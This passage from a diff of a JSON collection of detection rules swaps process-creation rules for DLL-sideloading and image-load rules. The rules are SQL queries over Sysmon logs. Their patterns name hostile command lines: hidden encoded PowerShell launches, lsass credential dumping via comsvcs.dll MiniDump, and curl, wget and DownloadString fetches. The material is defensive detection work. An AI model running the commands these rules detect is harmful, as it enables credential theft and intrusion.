'\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Network administrator computer" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + "filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "status": "experimental", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "status": "experimental", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "test", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", + "tags": [ + "attack.t1546.003", + "attack.persistence" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "falsepositives": [ + "Unknown (data set is too small; further testing needed)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + ], + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070" ], "falsepositives": [ - "Possible but rare" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "status": "experimental", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", - "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "status": "experimental", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR 